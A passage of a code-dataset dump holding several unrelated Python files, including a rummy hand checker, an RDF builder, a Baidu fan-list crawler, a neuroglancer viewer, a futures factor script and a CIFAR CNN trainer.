L0[i] :\n pos1 = i\n for j in range(pos1 + 1, len(L0)) :\n if i < len(L0):\n if L[1][1] == L0[j] :\n pos2 = j\n n = n + 1\n break;\n if n != 0 :\n break\n if n == 0 :\n return False\n return (pos1 - pos2)\n\ndef check_set(L) :\n c = 0\n j = check_jokers(L)\n if len(j) == 0 :\n if L[0][1] == L[1][1] == L[2][1] :\n c = c + 1\n if (L[0][0] != L[1][0] and L[0][0] != L[2][0] and L[1][0] != L[2][0]) :\n c = c + 1\n if c == 2 :\n return True\n \n if len(j) == 1 :\n L_new = [x for x in L if x != \"joker\"]\n if L_new[0][1] == L_new[1][1] :\n c = c + 1\n if L_new[0][0] != L_new[1] :\n c = c + 1\n if c == 2 :\n return True\n if len(j) == 2 :\n return True\n return False\n\n\ndef only_two_jokers(L) :\n c = 0\n for i in range(0, len(L)) :\n if L[i] == \"joker\" :\n c = c + 1\n return c\n\nprint(\"\\n\")\nprint(\"RUMMY DECLARATION CHECKER\\n\")\nprint(\"List1 = [H, S, D, C]\\n\")\nprint(\"\"\"List2 = ['A', '2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K', 'A']\\n\"\"\")\nprint(\"'joker' - Joker\\n\")\nprint(\"NOTE : T - value is 10\\n\")\nprint(\"\"\"Take one element from List1 and and another from List2 as a string and it represents a card\\n\"\"\")\nprint(\"Ex : H3 - Suit is Heart and Face value is 3\\n\"\"\") \nprint(\"NOTE : Only two Jokers are accepted\\n\")\nL = [] \nL0 = ['A', '2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K', 'A']\nL1 = []\nL2 = []\nL3 = []\nL4 = []\nwhile True :\n count = 0\n print(\"Please enter your LIFE1 of 4 cards on planck 1\")\n st = input(\"By giving spaces b/w each card name\\n\")\n L1 = st.split()\n count = only_two_jokers(L1) + count\n if count > 2 :\n print(\"only two jokers are acceptable for a game\")\n print(\"jokers were exceeded\")\n continue\n if len(L1) == 4 :\n break\n else :\n print(\"Please enter only 4 cards\")\n\nwhile True :\n print(\"Please enter your LIFE2 of 3 cards on planck 2\")\n st = input(\"By giving spaces b/w each card name\\n\")\n L2 = st.split()\n count = count + only_two_jokers(L2)\n if count > 2 :\n print(\"only two jokers are acceptable for a game\")\n print(\"jokers were exceeded\")\n count = count - only_two_jokers(L2)\n continue\n if len(L2) == 3 :\n break\n else :\n print(\"Please enter only 3 cards\")\nwhile True :\n print(\"Please enter your LIFE or SET of 3 cards on planck 3\")\n st = input(\"By giving spaces b/w each card name\\n\")\n L3 = st.split()\n count = count + only_two_jokers(L3)\n if count > 2 :\n print(\"only two jokers are acceptable for a game\")\n print(\"jokers were exceeded\")\n count = count - only_two_jokers(L3)\n continue\n if len(L3) == 3 :\n break\n else :\n print(\"Please enter only 3 cards\")\n\nwhile True :\n print(\"Please enter your LIFE or SET of 3 cards on planck 4\")\n st = input(\"By giving spaces b/w each card name\\n\")\n L4 = st.split()\n count = count + only_two_jokers(L4)\n if count > 2 :\n print(\"only two jokers are acceptable for a game\")\n print(\"jokers were exceeded\")\n count = count - only_two_jokers(L4)\n continue\n if len(L4) == 3 :\n break\n else :\n print(\"Please enter only 3 cards\")\n\ncount1 = 0\nL5 = []\nif check_pure(L1) :\n L5.append(\"P\")\nif check_impure(L1) :\n L5.append(\"I\")\nif check_pure(L2) :\n L5.append(\"P\")\nif check_impure(L2) :\n L5.append(\"I\")\nif (check_pure(L3) or check_impure(L3) or check_set(L3)) :\n count1 = count1 + 1\n L5.append(count1)\nif (check_pure(L4) or check_impure(L4) or check_set(L4)) :\n count1 = count1 + 1\n L5.append(count1)\n\nif L5 == [\"P\", \"I\", 1, 2] or L5 == [\"I\", \"P\", 1, 2] or L5 == [\"P\", \"P\", 1, 2]:\n print(\"Congratulations! You Completed the SHOW\")\nelse :\n print(\"Sorry, You cards don't make any SHOW\")\n","sub_path":"rummy.py","file_name":"rummy.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"143192855","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport csv\nfrom time import sleep\nimport pandas as pd\nimport json\nimport urllib.request\nimport os\nfrom PIL import Image\nimport yaml\nimport requests\nimport sys\nimport argparse\n\nfrom rdflib import URIRef, BNode, Literal, Graph\nfrom rdflib.namespace import RDF, RDFS, FOAF, XSD\nfrom rdflib import Namespace\n\nf = open(\"../settings.yml\", \"r+\")\nprefix = yaml.load(f, Loader=yaml.SafeLoader)[\"prefix\"]\n\nall = Graph()\n\n###########\n\njson_open = open(\"data/data.json\", 'r')\ngeo = json.load(json_open)\n\nfor sheet in geo:\n\n rows = sheet[\"value\"]\n\n for row in rows:\n if \"uri\" not in row and row[\"uri\"] == \"\":\n continue\n subject = URIRef(row[\"uri\"])\n\n stmt = (subject, RDFS.label, Literal(row[\"rdfs:label\"]))\n all.add(stmt)\n\n stmt = (subject, RDF.type, URIRef(\"https://jpsearch.go.jp/term/type/Place\"))\n all.add(stmt)\n\n for key in row:\n if \"description:\" in key:\n ln = key.replace(\"description:\", \"\").strip()\n stmt = (subject, URIRef(\"http://schema.org/description\"), Literal(ln+\": \"+row[key]))\n all.add(stmt)\n elif \"schema:description\" in key:\n if row[key] == \"\":\n continue\n stmt = (subject, RDFS.comment, Literal(row[key]))\n all.add(stmt)\n elif \"schema:geo\" in key:\n if row[key] == \"\":\n continue\n geo = URIRef(row[key])\n stmt = (subject, URIRef(\"http://schema.org/geo\"), geo)\n all.add(stmt)\n\n stmt = (geo, URIRef(\"http://schema.org/latitude\"), Literal(float(row[\"schema:latitude\"])))\n all.add(stmt)\n\n stmt = (geo, URIRef(\"http://schema.org/longitude\"), Literal(float(row[\"schema:longitude\"])))\n all.add(stmt)\n elif \"schema:url\" in key:\n manifest = URIRef(row[key])\n stmt = (subject, URIRef(\"http://schema.org/url\"), manifest)\n all.add(stmt)\n\n stmt = (manifest, RDF.type, URIRef(\"http://iiif.io/api/presentation/2#Manifest\"))\n all.add(stmt)\n elif \"schema:relatedLink\" in key:\n stmt = (subject, URIRef(\"http://schema.org/relatedLink\"), URIRef(row[key]))\n all.add(stmt)\n elif \"schema:isPartOf\" in key:\n parent = URIRef(row[key])\n stmt = (parent, URIRef(\"http://schema.org/spatial\"), subject)\n all.add(stmt)\n\n '''\n stmt = (parent, RDFS.label, Literal(row[\"parent:label\"]))\n all.add(stmt)\n '''\n\n parent_id = row[key].split(\"/\")[-1]\n\n stmt = (subject, URIRef(\"https://jpsearch.go.jp/term/property#sourceData\"), URIRef(prefix + \"/curation/\" + parent_id + \".json\"))\n all.add(stmt)\n\n\n\n elif \"schema:image\" in key:\n stmt = (subject, URIRef(\"http://schema.org/image\"), URIRef(row[key]))\n all.add(stmt)\n\n elif \"schema:category\" in key:\n if row[key] == \"\":\n continue\n\n stmt = (subject, URIRef(\"http://schema.org/category\"), Literal(row[key]))\n all.add(stmt)\n \n\n\npath = \"data/all.json\"\nall.serialize(destination=path, format='json-ld')\nall.serialize(destination=path.replace(\".json\", \".ttl\"), format='turtle')\nall.serialize(destination=path.replace(\".json\", \".rdf\"), format='xml')","sub_path":"src/301_rdf.py","file_name":"301_rdf.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"532863632","text":"#coding:utf-8\n\nfrom __future__ import unicode_literals\nfrom twisted.internet import defer, reactor\nfrom twisted.web.client import getPage\nfrom pymongo import MongoClient\nfrom time import time\nimport json\nimport logging\nimport re\n\ndb = MongoClient().sds\ndb.user.remove()\ndb.user.insert({'name':'baidu', 'list':[]})\n\nlogging.basicConfig(\n level=logging.DEBUG,\n filename='fans.log',\n format='%(asctime)s [%(filename)s:%(lineno)d] %(levelname)s %(message)s',\n filemode='w',\n)\n\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.DEBUG)\nformatter = logging.Formatter('[%(filename)s:%(lineno)d] %(levelname)s %(message)s')\nconsole.setFormatter(formatter)\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(console)\n\nURL = 'http://yun.baidu.com/pcloud/friend/getfanslist?query_uk={uk}&limit=24&start={start}'\ndb.user.update({'name':'baidu'}, {'name':'baidu', 'list':[]})\n\nstart = time()\n\ndef done(resp):\n if resp is not None: logger.debug(resp)\n reactor.stop()\n\ndef loop(resp, repeat, data, success, limit, turn, prepare, turn_limit):\n logger.debug('total success: {}'.format(len(success) - len(data)))\n logger.debug('total failure: {}'.format(len(data)))\n if len(data) == 0:\n if (turn is None) or (prepare is None) or (turn_limit is None):\n logger.debug('cost time: {}'.format(time() - start))\n reactor.stop()\n else:\n _data, _success = prepare(success)\n turn(_data, _success, limit=turn_limit)\n else:\n logger.debug('repeat')\n repeat(data, success, limit)\n\ndef fetch_fans(data, success, limit=None):\n def gen_defer(url):\n def callback(resp):\n fans = json.loads(resp)\n success[url] = [x['fans_uk'] for x in fans['fans_list']]\n new_list = db.user.find_one({'name':'baidu'})['list'] + success[url]\n db.user.update({'name':'baidu'}, {'name':'baidu', 'list':new_list})\n data.remove(url)\n logger.debug(success[url])\n\n def errback(err):\n logger.debug('[F] {}'.format(url))\n data.remove(url)\n data.append(url)\n\n d = getPage(url.encode('utf-8'), timeout=15)\n d.addCallbacks(callback, errback)\n\n return d\n\n dl = defer.DeferredList([gen_defer(url) for url in data[:limit]])\n dl.addCallbacks(loop, callbackArgs=[fetch_fans, data, success, limit, None, None, None])\n\ndef fetch_total_count(data, success, limit=None):\n def gen_defer(url):\n def callback(resp):\n fans = json.loads(resp)\n success[url] = fans['total_count']\n data.remove(url)\n logger.debug(fans['total_count'])\n\n def errback(err):\n logger.debug('[F] {}'.format(url))\n data.remove(url)\n data.append(url)\n\n d = getPage(url, timeout=15)\n d.addCallbacks(callback, errback)\n\n return d\n\n def prepare(_success):\n _data = []\n for url, total_count in _success.iteritems():\n if total_count > 0:\n uk = re.findall(r'query_uk=(\\d+)', url)[0]\n _data.extend([URL.format(uk=uk, start=start)\n for start in range(0, total_count, 24)])\n\n _success = {x: None for x in _data}\n return _data, _success\n\n dl = defer.DeferredList([gen_defer(url) for url in data])\n dl.addCallbacks(loop, callbackArgs=[fetch_total_count, data, success, limit, fetch_fans, prepare, 10])\n\n# data = [URL.format(uk=1208824379, start=0).encode('utf-8')]\ndata = [URL.format(uk=856454119, start=0).encode('utf-8')]\nlogger.debug(data)\nsuccess = {x: {} for x in data}\nfetch_total_count(data, success)\n# fetch_total_count(data, success)\n# fetch_total_count(data, success)\n\nreactor.run()\n","sub_path":"fans.py","file_name":"fans.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"291443266","text":"# -*- coding: UTF-8 -*-\nimport logging\nfrom GLOBALS import *\n\n\nclass Style:\n\n def __init__(self):\n pass\n\n RED = '\\033[31m'\n GREEN = '\\033[32m'\n YELLOW = '\\033[33m'\n BOLD = '\\033[1m'\n\n RESET = '\\033[0m'\n\n\nclass Logger:\n\n # LOG_FILE = '../utils/logs/testlogs.log'\n logger = logging.getLogger(LOG_FILE)\n ch = logging.StreamHandler()\n fh = logging.FileHandler(LOG_FILE)\n\n def __init__(self):\n self.logger.setLevel(logging.INFO)\n self.ch.setLevel(logging.INFO)\n\n # create formatter\n formatter = logging.Formatter('%(asctime)s - %(levelname)s: %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\n\n # add formatter to ch\n self.ch.setFormatter(formatter)\n self.fh.setLevel(logging.INFO)\n self.fh.setFormatter(formatter)\n\n # add ch to logs\n self.logger.addHandler(self.ch)\n self.logger.addHandler(self.fh)\n\n def get_logger(self):\n return self.logger\n\n\ndef info(logger, message):\n logger.info(message)\n\n\ndef error(logger, message):\n logger.error(Style.BOLD + Style.YELLOW + message + Style.RESET)\n","sub_path":"utils/logs/testlogger.py","file_name":"testlogger.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"471239686","text":"\nimport sys\ninput = sys.stdin.readline\n\nA, B = map(int, input().split())\nN, M = map(int, input().split())\nD = {'S': 0, 'E': 1, 'N': 2, 'W': 3}\ndx, dy = (-1, 0, 1, 0), (0, 1, 0, -1)\nw = [[0]*(A+1) for _ in range(B+1)]\nr = [[0, 0, 0] for _ in range(N+1)]\n\ndef solve(i, d, c):\n x, y, z = r[i]\n w[x][y] = 0\n for _ in range(c):\n if d == 'L':\n z = (z+1)%4\n elif d == 'R':\n z = (z+3)%4\n else:\n x, y = x+dx[z], y+dy[z]\n if x < 1 or x > B or y < 1 or y > A:\n print(\"Robot %d crashes into the wall\" % i)\n return True\n if w[x][y]:\n print(\"Robot %d crashes into robot %d\" % (i, w[x][y]))\n return True\n r[i] = x, y, z\n w[x][y] = i\n return False\n\nfor i in range(1, N+1):\n x, y, z = input().split()\n w[int(y)][int(x)] = i\n r[i] = [int(y), int(x), D[z]]\ncrash = False\nfor _ in range(M):\n i, d, c = input().split()\n if not crash:\n crash = solve(int(i), d, int(c))\nif not crash:\n print(\"OK\")\n","sub_path":"boj/boj_2174.py","file_name":"boj_2174.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"544908405","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\n\nimport webbrowser\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport h5py\nimport neuroglancer\nimport dxchange\nimport argparse\nimport os, signal\nimport re\nfrom .reader import omni_read\nfrom ast import literal_eval as make_tuple\n\ndef glance(viewer, image=None, labels=None, resolution=None):\n with viewer.txn() as s:\n s.voxel_size = resolution\n if image is not None:\n s.layers.append(\n name='image',\n layer=neuroglancer.LocalVolume(\n data=image,\n offset = (0,0,0),\n voxel_size = s.voxel_size,\n ),\n shader=\"\"\"\n void main() {\n emitRGB(vec3(toNormalized(getDataValue(0)),\n toNormalized(getDataValue(1)),\n toNormalized(getDataValue(2))));\n }\n \"\"\"),\n if labels is not None:\n s.layers.append(\n name='labels',\n layer=neuroglancer.LocalVolume(\n data=labels,\n offset = (0,0,0),\n voxel_size = s.voxel_size,\n ),\n )\n return viewer.get_viewer_url()\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument( '--image', default=None)\n parser.add_argument( '--labels', default=None)\n parser.add_argument( '--multi', default=False)\n parser.add_argument( '--begin', type=int, default=None)\n parser.add_argument( '--end', type=int, default=None)\n parser.add_argument( '--resolution', type=str, default='600,600,600')\n parser.add_argument( '--p', type=int, default=42000 )\n args = parser.parse_args()\n\n image = omni_read(args.image, args.begin, args.end)\n labels = omni_read(args.labels, args.begin, args.end)\n #resolution = make_tuple(args.resolution)\n resolution = tuple(int(d) for d in args.resolution.split(','))\n\n if image.dtype == np.float32:\n print('not 8bit')\n image = image * 255\n if labels is not None:\n if not args.multi:\n # only a single object\n labels = np.uint32(np.nan_to_num(labels)>0)\n else:\n labels = np.uint32(np.nan_to_num(labels))\n neuroglancer.set_server_bind_address(bind_address='127.0.0.1', bind_port=args.p)\n viewer = neuroglancer.Viewer()\n def dummy():\n print('hello callback')\n #viewer.defer_callback(dummy)\n url = glance(viewer=viewer, image=image, labels=labels, resolution=resolution)\n print(url)\n webbrowser.open_new_tab(url)\n\n\n def signal_handler(signal, frame):\n print('You pressed Ctrl+C!')\n sys.exit(0)\n signal.signal(signal.SIGINT, signal_handler)\n print('Press Ctrl+C')\n signal.pause()\n\nif __name__ == '__main__':\n main()","sub_path":"KLab_Utils/neuroglance_raw.py","file_name":"neuroglance_raw.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"146498045","text":"#!/usr/bin/python\n# Filename:Exercise_Function.py\n\ndef sayHello():\n\tprint ('Hello')\n\nsayHello()\n\ndef printMax(a,b):\n\tif a>b:\n\t\tprint ('Max Number is ',a)\n\telse:\n\t\tprint ('Max Number is ',b)\n\n\nnumA = int(input('Print a Number \\n'))\n\nnumB = int(input('Print a Number \\n'))\n\nprintMax(numA,numB)\n\ndef SetValue(a):\n\ta = 50\n\tprint ('Value is ',a)\n\nnumber = 70\n\nSetValue(number)\n\nprint ('Number is ',number)\n\nx = 70\n\ndef SetValueNa():\n\tglobal x\n\tx = 50\n\tprint (x)\n\nSetValueNa()\n\nprint ('x is ',x)","sub_path":"Exercise_Function.py","file_name":"Exercise_Function.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"314712107","text":"import os\nimport pandas as pd\nimport numpy as np\nimport tushare as ts\nfrom matplotlib import pyplot as plt\nfrom talib import MOM\nfrom utils.common import get_file_list\nfrom pandas import DataFrame\nfrom data_feed.tushare_feed import get_cal_date\n\n\nfather_dir = os.path.abspath(os.path.dirname(os.getcwd())) # 上一级目录\ngrandfather_dir = os.path.abspath(os.path.join(os.getcwd(), \"../..\")) # 上上级目录\nDCE_path = os.path.join(father_dir, 'data', 'tushare', 'DCE\\\\')\nSHF_path = os.path.join(father_dir, 'data', 'tushare', 'SHF\\\\')\nZCE_path = os.path.join(father_dir, 'data', 'tushare', 'ZCE\\\\')\nprices_path = os.path.join(father_dir, 'data', 'prices\\\\')\nfactors_path = os.path.join(father_dir, 'data', 'factors\\\\')\n\n# data = pd.read_csv(os.path.join(data_path, 'SHF\\\\', 'FU.SHF_20180102-20210528_daily.csv'))\n# data['trade_date'] = pd.to_datetime(data['trade_date'], format='%Y%m%d')\n# data = data.sort_values(by='trade_date', ascending=True)\n# data = data.set_index(data['trade_date'])\n# data = data.drop(columns=['Unnamed: 0', 'trade_date'])\n# data['mom'] = MOM(data.pre_close, 5)\n# print(data.index)\n\n# # 创建MultiIndex\n# # https://blog.csdn.net/sinat_26811377/article/details/98469964\n# date_idx = [val for val in factor_val.index for i in range(len(factor_val.columns))]\n# asset_idx = factor_val.columns.to_list() * len(factor_val.index)\n# # print(factor_val.columns)\n# # print(asset_idx)\n# # print(len(date_idx), len(asset_idx))\n# # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.MultiIndex.html\n# multi_idx = pd.MultiIndex.from_arrays([date_idx, asset_idx], names=('trade_date', 'asset'))\n# print(multi_idx)\n\n# # alphalens不接受日频datetimeIndex之外的index\n# prices = pd.read_csv('prices.csv', parse_dates=True, index_col=['date'])\n# zz = pd.read_csv('000905.SH.csv', parse_dates=True, index_col=['date_time'])\n# lens = prices.shape[0]\n# new_idx = zz.index[:lens]\n# prices['date'] = new_idx\n# prices.set_index('date', inplace=True)\n# prices.to_csv('prices.csv')\n# # print(prices.head())\n\n\ndef union_tushare_data(path_list, start: str, end: str, trade_cal: DataFrame):\n ser_l, files = [], []\n for path in path_list:\n files += get_file_list(path, [])\n for f in files:\n symbol = f.split('\\\\')[-1].split('.')[0]\n date_range = f.split('\\\\')[-1].split('.')[1].split('_')[1]\n b, e = date_range.split('-')[0], date_range.split('-')[1]\n if (b == start) & (e == end):\n temp = pd.read_csv(f)\n temp.rename(columns={'trade_date': 'date'}, inplace=True)\n temp['date'] = pd.to_datetime(temp['date'], format='%Y-%m-%d')\n temp = temp.sort_values(by='date', ascending=True)\n temp = temp.set_index(temp['date'])\n ser = temp['close_adj']\n ser.rename(symbol, inplace=True)\n if ser.size == trade_cal.shape[0]:\n ser_l.append(ser)\n print(f'{symbol} appended.')\n elif ser.size != trade_cal.shape[0]:\n print(f'{symbol} k_line len: {ser.size}, cal len: {trade_cal.shape[0]}, dropped.')\n df = pd.concat(ser_l, axis=1)\n return df\n\n\ndef gen_multi_index_factors(factors: DataFrame):\n factors = factors.T\n factors['asset'] = factors.index\n factors = factors.T\n factors = factors[:-1]\n row_L = []\n for i in factors.index:\n row = factors.loc[i]\n row = pd.DataFrame(row)\n row['date'] = row.columns[0]\n row.rename(columns={row.columns[0]: 'factor_value'}, inplace=True)\n row['asset'] = row.index\n row = row.reindex(columns=['date', 'asset', 'factor_value'])\n row_L.append(row)\n factor_mi = pd.concat(row_L)\n factor_mi.fillna(0, inplace=True)\n\n # https://stackoverflow.com/questions/42236701/turn-columns-into-multi-level-index-pandas\n factor_mi = factor_mi.set_index(['date', 'asset'], drop=True)\n # print(factor_mi.index.levels)\n # factor_mi = pd.Series(factor_mi['factor_value'].values, index=factor_mi.index)\n\n return factor_mi\n\n\n\"\"\"https://zhuanlan.zhihu.com/p/68613067\"\"\"\n\n\ndef winsor_data(data):\n q = data.quantile([0.02, 0.98])\n data[data < q.iloc[0]] = q.iloc[0]\n data[data > q.iloc[1]] = q.iloc[1]\n return data\n\n\n# 数据标准化\ndef MaxMinNormal(data):\n \"\"\"[0,1] normaliaztion\"\"\"\n x = (data - data.min()) / (data.max() - data.min())\n return x\n\n\nif __name__ == '__main__':\n start, end = '20180102', '20210601'\n trade_cal = get_cal_date(start, end)\n\n # 保存价格文件\n prices = union_tushare_data([DCE_path, SHF_path, ZCE_path], start=start, end=end, trade_cal=trade_cal)\n prices.to_csv(os.path.join(prices_path, 'prices.csv'))\n\n # 生成因子值文件\n L = []\n for col in prices.columns:\n # X = MOM(prices[col], 5)\n # 无负号动量因子,有负号反转因子\n X = np.log(prices[col] / prices[col].shift(5))\n X.name = col\n L.append(X)\n factors = pd.concat(L, axis=1)\n\n # 生成双重索引['date', 'asset']格式的因子值文件\n factors = gen_multi_index_factors(factors)\n factors.to_csv(os.path.join(factors_path, 'factors.csv'))\n\n # 因子归一化, CTA策略不要取极值\n # factors_new = factors['factor_value'].groupby('date').apply(winsor_data)\n factors_new = factors.groupby('date').apply(MaxMinNormal)\n factors_new.hist(figsize=(12, 6), bins=20)\n factors_new.to_csv(os.path.join(factors_path, 'factors_new.csv'))\n plt.show()\n\n # res.dropna(inplace=True)\n # factor_cols = list(filter(lambda x: 'MOM' in x, res.columns.tolist()))\n # factor = res[factor_cols]\n # res = res.set_index([index_a, index_b])\n","sub_path":"data_feed/prepare_for_alphalens.py","file_name":"prepare_for_alphalens.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"404724772","text":"import pickle\nimport os\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom layers import conv_layer, max_pool_2x2, full_layer\n\n\nDATA_PATH = \"C:/github_base/Oreilly-Learning-TensorFlow/data_dir/cifar_data\"\nBATCH_SIZE = 50\n#BATCH_SIZE = 70\n#STEPS = 500000\n#STEPS = 300000\nSTEPS = 2000\n\ndef one_hot(vec, vals=10):\n n = len(vec)\n out = np.zeros((n, vals))\n out[range(n), vec] = 1\n return out\n\ndef unpickle(file):\n with open(os.path.join(DATA_PATH, file), 'rb') as fo:\n u = pickle._Unpickler(fo)\n u.encoding = 'latin1'\n dict = u.load()\n return dict\n\ndef display_cifar_sorted(images, labels, size):\n # print('labels shape is', labels.shape)\n # print('np.argwhere(labels==2) shape ', np.argwhere(labels==2).shape)\n # print('shape2 is ', np.random.choice(np.argwhere(labels == 2).ravel(), 10))\n n = len(images)\n plt.figure()\n plt.gca().set_axis_off()\n im = np.vstack([np.hstack(images[np.random.choice(np.argwhere(labels==i).ravel(), 10)])\n for i in range(size)])\n # print('im shape ', im.shape)\n plt.imshow(im)\n plt.show()\n\ndef display_cifar(images, size):\n n = len(images)\n plt.figure()\n plt.gca().set_axis_off()\n im = np.vstack([np.hstack([images[np.random.choice(n)] for i in range(size)])\n for i in range(size)])\n plt.imshow(im)\n plt.show()\n\ndef plot_accuracy(iter_list, test_accuracy_list, train_accuracy_list=None):\n import matplotlib.pyplot as plt\n plt.plot(iter_list, test_accuracy_list, color='red', label='test accuracy')\n if train_accuracy_list:\n plt.plot(iter_list, train_accuracy_list, color='blue', label='train accuracy')\n plt.legend()\n plt.xlabel('iter num')\n plt.ylabel('accuracy')\n plt.show()\n\n\nclass CifarLoader(object):\n \"\"\"\n Load and mange the CIFAR dataset.\n (for any practical use there is no reason not to use the built-in dataset handler instead)\n \"\"\"\n def __init__(self, source_files):\n self._source = source_files\n self._i = 0\n self.images = None\n self.labels = None\n self.raw_labels = None\n\n def load(self):\n data = [unpickle(f) for f in self._source]\n images = np.vstack([d[\"data\"] for d in data])\n n = len(images)\n self.images = images.reshape(n, 3, 32, 32).transpose(0, 2, 3, 1)\\\n .astype(float) / 255\n self.raw_labels = np.hstack([d[\"labels\"] for d in data])\n self.labels = one_hot(np.hstack([d[\"labels\"] for d in data]), 10)\n return self\n\n def next_batch(self, batch_size):\n x, y = self.images[self._i:self._i+batch_size], \\\n self.labels[self._i:self._i+batch_size]\n self._i = (self._i + batch_size) % len(self.images)\n return x, y\n\n def random_batch(self, batch_size):\n n = len(self.images)\n ix = np.random.choice(n, batch_size)\n return self.images[ix], self.labels[ix]\n\n\nclass CifarDataManager(object):\n def __init__(self):\n self.train = CifarLoader([\"data_batch_{}\".format(i) for i in range(1, 6)])\\\n .load()\n self.test = CifarLoader([\"test_batch\"]).load()\n\n\ndef run_simple_net():\n print('get into run_simple_net')\n cifar = CifarDataManager()\n\n x = tf.placeholder(tf.float32, shape=[None, 32, 32, 3])\n y_ = tf.placeholder(tf.float32, shape=[None, 10])\n keep_prob = tf.placeholder(tf.float32)\n\n conv1 = conv_layer(x, shape=[5, 5, 3, 32])\n conv1_pool = max_pool_2x2(conv1)\n\n print('get into run_simple_net 111')\n\n conv2 = conv_layer(conv1_pool, shape=[5, 5, 32, 64])\n conv2_pool = max_pool_2x2(conv2)\n\n # conv3 = conv_layer(conv2_pool, shape=[5, 5, 64, 128])\n conv3 = conv_layer(conv2_pool, shape=[5, 5, 64, 100])\n conv3_pool = max_pool_2x2(conv3)\n\n conv4 = conv_layer(conv3_pool, shape=[5, 5, 100, 256])\n conv4_pool = max_pool_2x2(conv4)\n print('conv4_pool.get_shape() is ', conv4_pool.get_shape())\n #conv4_flat = tf.reshape(conv4_pool, [-1, 4 * 4 * 256])\n conv4_flat = tf.reshape(conv4_pool, [-1, 2 * 2 * 256])\n conv4_drop = tf.nn.dropout(conv4_flat, keep_prob=keep_prob)\n\n print('get into run_simple_net 222')\n\n full_1 = tf.nn.relu(full_layer(conv4_drop, 512))\n full1_drop = tf.nn.dropout(full_1, keep_prob=keep_prob)\n\n y_conv = full_layer(full1_drop, 10)\n\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv,\n labels=y_))\n train_step = tf.train.AdamOptimizer(1e-3).minimize(cross_entropy)\n\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n def test(sess):\n X = cifar.test.images.reshape(10, 1000, 32, 32, 3)\n Y = cifar.test.labels.reshape(10, 1000, 10)\n acc = np.mean([sess.run(accuracy, feed_dict={x: X[i], y_: Y[i], keep_prob: 1.0})\n for i in range(10)])\n #print(\"test accuracy: {:.4}%\".format(acc * 100))\n return acc\n\n print('get into run_simple_net 333')\n iter_list, test_accuracy_list, train_accuracy_list = [], [], []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for i in range(STEPS):\n #batch = cifar.train.next_batch(BATCH_SIZE)\n batch = cifar.train.random_batch(BATCH_SIZE)\n sess.run(train_step, feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n\n if i % 500 == 0:\n iter_list.append(i)\n train_acc = np.mean([sess.run(accuracy,\n feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n for i in range(10)])\n train_accuracy_list.append(train_acc)\n test_acc = test(sess)\n test_accuracy_list.append(test_acc)\n\n print('step i:{0:6} train_acc: {1:.6f} test_acc: {2:.6f}'.format(\n i, train_acc, test_acc))\n\n test(sess)\n plot_accuracy(iter_list, test_accuracy_list, train_accuracy_list)\n\n\ndef build_second_net():\n cifar = CifarDataManager()\n print('in build_second_net 111')\n\n x = tf.placeholder(tf.float32, shape=[None, 32, 32, 3])\n y_ = tf.placeholder(tf.float32, shape=[None, 10])\n keep_prob = tf.placeholder(tf.float32)\n\n C1, C2, C3 = 32, 64, 128\n F1 = 600\n\n conv1_1 = conv_layer(x, shape=[3, 3, 3, C1])\n conv1_2 = conv_layer(conv1_1, shape=[3, 3, C1, C1])\n conv1_3 = conv_layer(conv1_2, shape=[3, 3, C1, C1])\n conv1_pool = max_pool_2x2(conv1_3)\n conv1_drop = tf.nn.dropout(conv1_pool, keep_prob=keep_prob)\n\n print('in build_second_net 222')\n\n conv2_1 = conv_layer(conv1_drop, shape=[3, 3, C1, C2])\n conv2_2 = conv_layer(conv2_1, shape=[3, 3, C2, C2])\n conv2_3 = conv_layer(conv2_2, shape=[3, 3, C2, C2])\n conv2_pool = max_pool_2x2(conv2_3)\n conv2_drop = tf.nn.dropout(conv2_pool, keep_prob=keep_prob)\n\n \n\n print('in build_second_net 333')\n\n conv3_1 = conv_layer(conv2_drop, shape=[3, 3, C2, C3])\n conv3_2 = conv_layer(conv3_1, shape=[3, 3, C3, C3])\n conv3_3 = conv_layer(conv3_2, shape=[3, 3, C3, C3])\n conv3_pool = tf.nn.max_pool(conv3_3, ksize=[1, 8, 8, 1], strides=[1, 8, 8, 1], padding='SAME')\n conv3_flat = tf.reshape(conv3_pool, [-1, C3])\n conv3_drop = tf.nn.dropout(conv3_flat, keep_prob=keep_prob)\n\n full1 = tf.nn.relu(full_layer(conv3_drop, F1))\n full1_drop = tf.nn.dropout(full1, keep_prob=keep_prob)\n\n y_conv = full_layer(full1_drop, 